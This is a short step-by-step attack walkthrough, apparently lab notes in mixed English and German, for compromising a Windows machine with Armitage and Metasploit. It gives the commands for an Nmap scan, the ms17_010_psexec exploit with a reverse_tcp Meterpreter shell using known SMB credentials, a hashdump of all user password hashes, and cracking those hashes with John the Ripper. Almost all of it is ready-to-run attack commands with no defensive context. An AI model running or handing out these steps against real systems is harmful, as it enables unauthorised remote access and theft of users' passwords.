start with: armitage (accept IP an Port)
Next, you will connect to the victim’s system. To do this, click Hosts, select Nmap Scan and then select Quick Scan.
Insert Target-IP, press ok and wait for the end of the scan. You will see the Target in the upper screen Next, you will prepare and launch the PsExec exploit. To do this, click Attacks and select Find Attacks.
Wait for „Happy Hunting“ and klick ok
You will now use the PsExec exploit. To do this, type the following command:
use exploit/windows/smb/ms17_010_psexec set RHOST 192.168.0.5 set LPORT 4444
Now, you need to set the payload. Type the following command:
set payload windows/x64/meterpreter/reverse_tcp set SMBUser admin -> ein bekanter User set SMBPass Passw0rd -> und sein Passwort set VerifyTarget false run
Right-click the System icon, select Meterpreter 1, select Interact, and then select Meterpreter Shell.
Notice that a new tab with the name Meterpreter 1 is now opened in the bottom pane. →x use it
run post/windows/gather/hashdump
You will see all users Hashes. Copy all Hashes-lines includet user:*** in a *.txt-File Now try to hack the Hash with John. You need:
Use John:
john --wordlist=/root/Desktop/pass.txt --format=NT /root/Desktop/hashes.txt